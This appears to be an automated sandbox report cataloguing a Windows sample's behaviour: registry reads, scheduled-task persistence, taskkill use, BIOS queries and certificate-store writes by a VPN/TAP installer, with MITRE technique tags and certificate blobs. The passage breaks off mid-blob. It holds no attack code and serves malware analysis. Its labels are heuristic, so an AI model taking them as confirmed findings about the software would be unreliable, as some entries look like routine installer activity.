Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LowerFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	svchost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6108 schtasks.exe
60 schtasks.exe

pid	process
6108	schtasks.exe
60	schtasks.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeLoy6GQKfoZWtolK.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Loy6GQKfoZWtolK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Loy6GQKfoZWtolK.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5732 taskkill.exe

pid	process
5732	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

DrvInst.exemask_svc.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-622 = "Korea Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2871 = "Magallanes Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe

Modifies registry class 6 IoCs

Processes:

msedge.exevpn.tmp

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}	vpn.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}"	vpn.tmp

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tapinstall.exevpn.tmp

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8